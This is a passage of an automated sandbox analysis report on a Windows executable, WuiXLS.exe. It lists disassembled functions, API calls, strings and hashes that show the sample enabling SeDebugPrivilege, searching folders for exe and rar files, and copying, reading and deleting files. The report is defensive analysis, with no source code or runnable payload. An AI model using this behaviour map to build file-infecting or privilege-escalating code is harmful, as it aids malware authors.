                                          • FindCloseChangeNotification.KERNELBASE(?,?,007032B0,00000164,00702986,?), ref: 0070234E
                                          • CloseHandle.KERNEL32(000000FF,?,007032B0,00000164,00702986,?), ref: 00702359
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: File$CloseView$Pointer$ChangeCreateFindHandleNotificationUnmapWritememset$AttributesFlushMappingmemcpy
                                          • String ID: .@p$5@p$<@p$C@p$m@p
                                          • API String ID: 3349749541-394526410
                                          • Opcode ID: a2e237cc42a149fb0adc03402d2976e38c0b85c8983f514e1ea962eb1f28f35d
                                          • Instruction ID: a9799bf61e222c73cff8608772714633df324ea72f4b3c6eb06bc55da2c6e28c
                                          • Opcode Fuzzy Hash: a2e237cc42a149fb0adc03402d2976e38c0b85c8983f514e1ea962eb1f28f35d
                                          • Instruction Fuzzy Hash: 5DF18471900209EFDB20DFA4DC89AADBBF5FF08314F10862AE519A7691D738AD42CF54
                                          Function 00701973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144filesleepmemoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 117 701973-70199a PathFileExistsA 118 7019a0-7019aa 117->118 119 701ac7-701acc 117->119 122 7019af-7019c2 CreateFileA 118->122 120 701ad0-701ad5 119->120 121 701ace 119->121 125 701af0-701af6 120->125 126 701ad7-701ad9 120->126 121->120 123 7019c4-7019d3 Sleep 122->123 124 701a28-701a36 GetFileSize 122->124 123->122 127 7019d5-701a0b call 70185b wsprintfA CopyFileA 123->127 128 701a87-701a8b 124->128 129 701a38-701a3b 124->129 126->125 127->124 141 701a0d-701a26 CreateFileA 127->141 132 701a96-701a9a 128->132 133 701a8d-701a90 FindCloseChangeNotification 128->133 129->128 131 701a3d-701a51 VirtualAlloc 129->131 131->128 135 701a53-701a57 131->135 136 701a9c 132->136 137 701aad-701ab1 132->137 133->132 142 701a80 135->142 143 701a59-701a6d ReadFile 135->143 138 701aa0-701aa7 DeleteFileA 136->138 139 701ab3-701ab6 137->139 140 701adb-701ae0 137->140 138->137 139->119 144 701ab8-701ac1 VirtualFree 139->144 146 701ae2-701ae5 140->146 147 701ae7-701aec 140->147 141->124 145 701a9e 141->145 142->128 143->128 148 701a6f-701a7e 143->148 144->119 145->138 146->147 147->125 149 701aee 147->149 148->142 148->143 149->125
                                          APIs
                                          • PathFileExistsA.KERNELBASE(\Np`Np,00000000,C:\Users\user\AppData\Local\Temp\WuiXLS.exe), ref: 00701992
                                          • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 007019BA
                                          • Sleep.KERNEL32(00000064), ref: 007019C6
                                          • wsprintfA.USER32 ref: 007019EC
                                          • CopyFileA.KERNEL32(?,?,00000000), ref: 00701A00
                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00701A1E
                                          • GetFileSize.KERNEL32(?,00000000), ref: 00701A2C
                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00701A46
                                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00701A65
                                          • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 00701A90
                                          • DeleteFileA.KERNEL32(?), ref: 00701AA7
                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00701AC1
                                          Strings
                                          • \Np`Np, xrefs: 00701980
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 007019DB
                                          • %s%.8X.data, xrefs: 007019E6
                                          • C:\Users\user\AppData\Local\Temp\WuiXLS.exe, xrefs: 0070197C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                                          • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\WuiXLS.exe$\Np`Np
                                          • API String ID: 2523042076-1186948972
                                          • Opcode ID: d802474b7b0daea8fcccd57dd6788eef08be2de70f6c5864e6395e74ba158e0f
                                          • Instruction ID: c52c57f148b9731a6bce77fc3256249cad7ebc8869c8b0817514e50a1dabb279
                                          • Opcode Fuzzy Hash: d802474b7b0daea8fcccd57dd6788eef08be2de70f6c5864e6395e74ba158e0f
                                          • Instruction Fuzzy Hash: 5E514EB1A01219EFDB109F98CD84AAEBBFDFB04354F508669F515E62D0D7789E40CBA0
                                          Function 007028B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 150 7028b8-7028ff memset wsprintfA 151 702905-70290d 150->151 152 7029db-7029df 150->152 151->152 153 702913-702919 151->153 154 702956-702965 strrchr 153->154 155 70291b-70294c memset wsprintfA call 7029e2 153->155 154->152 157 702967-702978 lstrcmpiA 154->157 158 702951 155->158 159 702988-702992 lstrcmpiA 157->159 160 70297a-702981 call 701e6e 157->160 158->152 159->152 162 702994-70299b 159->162 163 702986 160->163 164 7029ad-7029c9 strstr 162->164 165 70299d-7029a3 162->165 163->152 167 7029d3-7029d6 call 702692 164->167 168 7029cb-7029d1 call 70239d 164->168 165->164 166 7029a5-7029a7 lstrcpy 165->166 166->164 167->152 168->152
                                          APIs
                                          • memset.MSVCRT ref: 007028D3
                                          • wsprintfA.USER32 ref: 007028F7
                                          • memset.MSVCRT ref: 00702925
                                          • wsprintfA.USER32 ref: 00702940
                                            • Part of subcall function 007029E2: memset.MSVCRT ref: 00702A02
                                            • Part of subcall function 007029E2: wsprintfA.USER32 ref: 00702A1A
                                            • Part of subcall function 007029E2: memset.MSVCRT ref: 00702A44
                                            • Part of subcall function 007029E2: lstrlen.KERNEL32(?), ref: 00702A54
                                            • Part of subcall function 007029E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00702A6C
                                            • Part of subcall function 007029E2: strrchr.MSVCRT ref: 00702A7C
                                            • Part of subcall function 007029E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00702A9F
                                            • Part of subcall function 007029E2: lstrlen.KERNEL32(Documents and Settings), ref: 00702AAE
                                            • Part of subcall function 007029E2: memset.MSVCRT ref: 00702AC6
                                            • Part of subcall function 007029E2: memset.MSVCRT ref: 00702ADA
                                            • Part of subcall function 007029E2: FindFirstFileA.KERNELBASE(?,?), ref: 00702AEF
                                            • Part of subcall function 007029E2: memset.MSVCRT ref: 00702B13
                                          • strrchr.MSVCRT ref: 00702959
                                          • lstrcmpiA.KERNEL32(00000001,exe), ref: 00702974
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                          • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                          • API String ID: 3004273771-1035934456
                                          • Opcode ID: c35904a71feed9eb640f0aed938a097f38bfbff6dcf716d7b87aa9f5aed24218
                                          • Instruction ID: 30cfcce38ede8fa8b5d55b17d8a838cc12adfbe2c1d12ceeff79ed9c2e4ed2ff
                                          • Opcode Fuzzy Hash: c35904a71feed9eb640f0aed938a097f38bfbff6dcf716d7b87aa9f5aed24218
                                          • Instruction Fuzzy Hash: 923197B394031DFBDB209764DC8DFDA77DCAB14314F154652F545A20C2DABCAAC58BA0
                                          Function 00701638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70stringsynchronizationthreadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 0070164F
                                          • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0070165B
                                          • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\WuiXLS.exe,00000104), ref: 0070166E
                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 007016AC
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 007016BD
                                            • Part of subcall function 0070139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WuiXLS.exe), ref: 007013BC
                                            • Part of subcall function 0070139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 007013DA
                                            • Part of subcall function 0070139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00701448
                                          • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\WuiXLS.exe), ref: 007016E5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\WuiXLS.exe$C:\Windows\system32$Documents and Settings
                                          • API String ID: 123563730-3936800671
                                          • Opcode ID: 61f1b741d19f63539be094861b4322d72f727848ffb0ddb97ab9bc395b99fa4d
                                          • Instruction ID: 4ddcc515614a62a53ebcfd4beed9c24d235e900aeb766d2875f6d41d0477ab5c
                                          • Opcode Fuzzy Hash: 61f1b741d19f63539be094861b4322d72f727848ffb0ddb97ab9bc395b99fa4d
                                          • Instruction Fuzzy Hash: C411B6B1502214FBDB2167A59D4DE9B3EEEEB45361F408315F309910E0CE7D8940C7B5
                                          Function 00702C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 366 702c48-702c75 memset call 701973 369 702cb2-702cb9 366->369 370 702c77-702c7f 366->370 371 702cc8-702ccc 369->371 372 702cbb-702cc2 VirtualFree 369->372 373 702c81-702c8b 370->373 374 702c8f-702cac CreateThread WaitForMultipleObjects 370->374 372->371 373->374 374->369
                                          APIs
                                          • memset.MSVCRT ref: 00702C57
                                            • Part of subcall function 00701973: PathFileExistsA.KERNELBASE(\Np`Np,00000000,C:\Users\user\AppData\Local\Temp\WuiXLS.exe), ref: 00701992
                                            • Part of subcall function 00701973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 007019BA
                                            • Part of subcall function 00701973: Sleep.KERNEL32(00000064), ref: 007019C6
                                            • Part of subcall function 00701973: wsprintfA.USER32 ref: 007019EC
                                            • Part of subcall function 00701973: CopyFileA.KERNEL32(?,?,00000000), ref: 00701A00
                                            • Part of subcall function 00701973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00701A1E
                                            • Part of subcall function 00701973: GetFileSize.KERNEL32(?,00000000), ref: 00701A2C
                                            • Part of subcall function 00701973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00701A46
                                            • Part of subcall function 00701973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00701A65
                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 00702C99
                                          • WaitForMultipleObjects.KERNEL32(00000001,007016BA,00000001,000000FF,?,007016BA,00000000), ref: 00702CAC
                                          • VirtualFree.KERNEL32(001E0000,00000000,00008000,C:\Users\user\AppData\Local\Temp\WuiXLS.exe,00704E5C,00704E60,?,007016BA,00000000), ref: 00702CC2
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\WuiXLS.exe, xrefs: 00702C69
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                          • String ID: C:\Users\user\AppData\Local\Temp\WuiXLS.exe
                                          • API String ID: 2042498389-449498752
                                          • Opcode ID: 707d425b1d4eaec5befb9ed6ee52f9d60eb756f36f27457663a2ab2e9cd257f6
                                          • Instruction ID: 292040b32ff5c4f3478fe320ba09a9a140acdd37c139c02ed2b61eb4ba82afb4
                                          • Opcode Fuzzy Hash: 707d425b1d4eaec5befb9ed6ee52f9d60eb756f36f27457663a2ab2e9cd257f6
                                          • Instruction Fuzzy Hash: A70184B2641220FAE710A795DC0EE9F7EDDEF01B50F108314B605D61C2D9A89900C7B4
                                          Function 007014E1 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 375 7014e1-7014fb 376 701541-701547 375->376 377 7014fd-701510 GetModuleHandleA 375->377 380 701573-701574 call 701638 376->380 381 701549-70154c 376->381 378 701512-701518 377->378 379 70151a-701535 VirtualQuery 377->379 378->376 382 701537-701539 379->382 383 70153b 379->383 387 701579-70157a ExitProcess 380->387 384 701569-701570 381->384 385 70154e-701555 381->385 382->376 382->383 383->376 385->384 388 701557-701566 call 701af9 385->388 388->384
                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000), ref: 00701504
                                          • VirtualQuery.KERNEL32(007014E1,?,0000001C), ref: 00701525
                                          • ExitProcess.KERNEL32 ref: 0070157A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: ExitHandleModuleProcessQueryVirtual
                                          • String ID:
                                          • API String ID: 3946701194-0
                                          • Opcode ID: c6951e3d452c3765452b5e428695616e0c42566d6b8917093235f2217dffbd12
                                          • Instruction ID: 266529a968c6d67ba6f948e3f7e6447ddc1fb9e244f22c8079b6aa57d417b019
                                          • Opcode Fuzzy Hash: c6951e3d452c3765452b5e428695616e0c42566d6b8917093235f2217dffbd12
                                          • Instruction Fuzzy Hash: B2117CB1A01204DFCB20EFA5AC84A7D77FCEB84715B90832EF602DB190DA7C8941AB54
                                          Function 00701915 Relevance: 4.5, APIs: 3, Instructions: 41timeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 391 701915-701922 392 701924-701926 391->392 393 701928-70192c 391->393 394 70196e-701970 392->394 395 70192e-70194d memset GetFileTime 393->395 396 70194f-701952 393->396 397 701966-701968 395->397 396->394 398 701954-701960 SetFileTime 396->398 399 70196a 397->399 400 70196c 397->400 398->397 399->400 400->394
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: FileTimememset
                                          • String ID:
                                          • API String ID: 176422537-0
                                          • Opcode ID: fdfcbb9c46d2722e58875f0401eec90482097419f705e76a873ec3d29bc18c0c
                                          • Instruction ID: 94746acccc2f1b22905aba62dada2c33625c0340b4ee17ab73fc8c6520c80f0b
                                          • Opcode Fuzzy Hash: fdfcbb9c46d2722e58875f0401eec90482097419f705e76a873ec3d29bc18c0c
                                          • Instruction Fuzzy Hash: 39F04436210649EBD7209E26DC04AA777EDAB50361F408636F556D10D0E774E6458BB0
                                          Function 00706159 Relevance: 2.6, APIs: 2, Instructions: 58memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 401 706159-706189 VirtualFree 402 70618c-706192 401->402 403 7060c7-7060cf 402->403 404 706198-7061b0 VirtualFree 402->404 403->402 405 7060d5-7060f8 VirtualAlloc 403->405 406 7061b2-7061b4 404->406 407 7061ba-7061c8 404->407 427 7060fa-7060fc call 7066c8 405->427 428 7060fe-706106 405->428 406->407 408 706243-706251 407->408 409 7061ca-7061d7 407->409 413 706253 408->413 414 706264-70626f 408->414 411 7061dd-7061e0 409->411 411->408 416 7061e2-7061f2 411->416 418 706255-706258 413->418 415 706271-706276 414->415 419 706389-7063b1 VirtualProtect 415->419 420 70627c-706289 415->420 421 7061f5-7061fe 416->421 418->414 423 70625a-706262 418->423 426 7063b7-7063ba 419->426 440 706292-706298 420->440 441 70628b 420->441 424 706200-706203 421->424 425 70620c-706219 421->425 423->418 430 706205-706208 424->430 431 70621b-706228 424->431 432 706238-70623f 425->432 433 7063fc-7063ff VirtualProtect 426->433 434 7063bc-7063c2 426->434 427->428 436 706155-706189 VirtualFree 428->436 437 706108-70611d 428->437 442 70622a-706236 430->442 443 70620a 430->443 431->432 432->421 445 706241 432->445 439 706400-706416 433->439 434->434 444 7063c4 434->444 436->402 438 70611f-706121 437->438 447 706151-706154 438->447 448 706123 438->448 449 706420-706425 439->449 450 706418-70641d 439->450 451 7062a2-7062ac 440->451 441->440 442->432 443->432 444->433 452 7063c6-7063cf 444->452 445->411 447->436 448->447 453 706125-706128 448->453 454 7062b1-7062c8 451->454 455 7062ae 451->455 456 7063d1 452->456 457 7063d4-7063d8 452->457 458 706134-70613b 453->458 459 70612a-70612e 453->459 460 706373-706384 454->460 461 7062ce-7062d4 454->461 455->454 456->457 462 7063da 457->462 463 7063dd-7063e1 457->463 470 706130-706132 458->470 471 70613d-70614f 458->471 459->458 459->470 460->415 468 7062d6-7062d9 461->468 469 7062da-7062f1 461->469 462->463 464 7063e3 463->464 465 7063e7-7063fa VirtualProtect 463->465 464->465 465->426 465->433 468->469 473 7062f3-7062f9 469->473 474 706365-70636e 469->474 470->438 471->438 475 706314-706326 473->475 476 7062fb-70630f 473->476 474->451 478 706328-70634a 475->478 479 70634c-706360 475->479 477 706426-7064a9 476->477 489 706519-70651c 477->489 490 7064ab-7064c0 477->490 478->474 479->477 491 706583-706587 489->491 492 70651d-70651e 489->492 496 7064c2 490->496 497 706535-706537 490->497 494 706588-70658b 491->494 495 706522-706533 492->495 498 7065a1-7065a3 494->498 499 70658d-70658f 494->499 495->497 502 7064c5-7064cd 496->502 503 7064f8 496->503 500 706539 497->500 501 70659a 497->501 504 706591-706593 499->504 505 7065b4 500->505 506 70653b-706541 500->506 507 70659b-70659d 501->507 508 706542-706545 502->508 509 7064cf-7064d4 502->509 510 7064fa-7064fe 503->510 511 70656c-70656f 503->511 504->507 512 706595 504->512 517 7065be-7065db 505->517 506->508 507->504 513 70659f 507->513 514 70654d-706550 508->514 515 7064d6-7064d9 509->515 516 706517-706518 509->516 518 706500 510->518 519 706572 510->519 511->519 512->501 513->494 514->517 522 706552-706556 514->522 515->514 523 7064db-7064f5 515->523 516->489 524 7065dd-7065f6 517->524 518->495 520 706502 518->520 521 706573-706576 519->521 520->521 526 706504-706513 520->526 527 706578-70657a 521->527 522->527 528 706558-706569 522->528 523->503 525 7065f7-706608 524->525 526->497 529 706515 526->529 527->524 530 70657c 527->530 528->511 529->516 530->525 531 70657e-70657f 530->531 531->491
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 007060DF
                                          • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00706189
                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007061A5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: Virtual$Free$Alloc
                                          • String ID:
                                          • API String ID: 1852963964-0
                                          • Opcode ID: a8c3c720404d173a8c2c667b43543808c387c1cd609753710bd385afc45ac066
                                          • Instruction ID: 977faa4f513d2134ab1c34203ced7c6d385df7206f7921e0270394e562520f8c
                                          • Opcode Fuzzy Hash: a8c3c720404d173a8c2c667b43543808c387c1cd609753710bd385afc45ac066
                                          • Instruction Fuzzy Hash: E8114931A04659CFCB318F588CA17DD37E1FF01301F690619DE899B2D2DA792964CB94

                                          Non-executed Functions

                                          Function 0070119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\WuiXLS.exe,?,?,?,?,?,?,007013EF), ref: 007011AB
                                          • OpenProcessToken.ADVAPI32(00000000,00000028,007013EF,?,?,?,?,?,?,007013EF), ref: 007011BB
                                          • AdjustTokenPrivileges.ADVAPI32(007013EF,00000000,?,00000010,00000000,00000000), ref: 007011EB
                                          • CloseHandle.KERNEL32(007013EF), ref: 007011FA
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,007013EF), ref: 00701203
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\WuiXLS.exe, xrefs: 007011A5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                          • String ID: C:\Users\user\AppData\Local\Temp\WuiXLS.exe
                                          • API String ID: 75692138-449498752
                                          • Opcode ID: a1b5bfc6f132429bf228f0da238c915cdb5d65183b2f3f23b80fac934170201a
                                          • Instruction ID: c586f3376807fe20a32c42ef387ad6d79aec30de184f938622f048133facc82a
                                          • Opcode Fuzzy Hash: a1b5bfc6f132429bf228f0da238c915cdb5d65183b2f3f23b80fac934170201a
                                          • Instruction Fuzzy Hash: D5012871901208EFDB00DFD4CD89AAEBBBDFB04304F108269E605E2190DB745F449B50
                                          Function 0070139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WuiXLS.exe), ref: 007013BC
                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 007013DA
                                          • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00701448
                                            • Part of subcall function 0070119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\WuiXLS.exe,?,?,?,?,?,?,007013EF), ref: 007011AB
                                            • Part of subcall function 0070119F: OpenProcessToken.ADVAPI32(00000000,00000028,007013EF,?,?,?,?,?,?,007013EF), ref: 007011BB
                                            • Part of subcall function 0070119F: AdjustTokenPrivileges.ADVAPI32(007013EF,00000000,?,00000010,00000000,00000000), ref: 007011EB
                                            • Part of subcall function 0070119F: CloseHandle.KERNEL32(007013EF), ref: 007011FA
                                            • Part of subcall function 0070119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,007013EF), ref: 00701203
                                          Strings
                                          • SeDebugPrivilege, xrefs: 007013D3
                                          • C:\Users\user\AppData\Local\Temp\WuiXLS.exe, xrefs: 007013A8
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1505793813.0000000000701000.00000020.00000001.01000000.00000004.sdmp, Offset: 00700000, based on PE: true
                                          • Associated: 00000002.00000002.1505774690.0000000000700000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505826746.0000000000704000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000002.00000002.1505843186.0000000000706000.00000040.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_700000_WuiXLS.jbxd
                                          Similarity
                                          • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                          • String ID: C:\Users\user\AppData\Local\Temp\WuiXLS.exe$SeDebugPrivilege
                                          • API String ID: 4123949106-1797348126
                                          • Opcode ID: 52e9e3a8fd25bca5e2cb103f3092ffda48294e57c74bb1230b65a31d24ebbe80
                                          • Instruction ID: 1be8ec2c0ec398891e12426a47d9c3873756b6a5eda659083167a101d98482ba
                                          • Opcode Fuzzy Hash: 52e9e3a8fd25bca5e2cb103f3092ffda48294e57c74bb1230b65a31d24ebbe80
                                          • Instruction Fuzzy Hash: DA314F71D00249EADF60DBA58C45FEEBBF8EB44705FA08269F504B3191D6789E45CB60
                                          Function 0070239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239sleepfilestringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
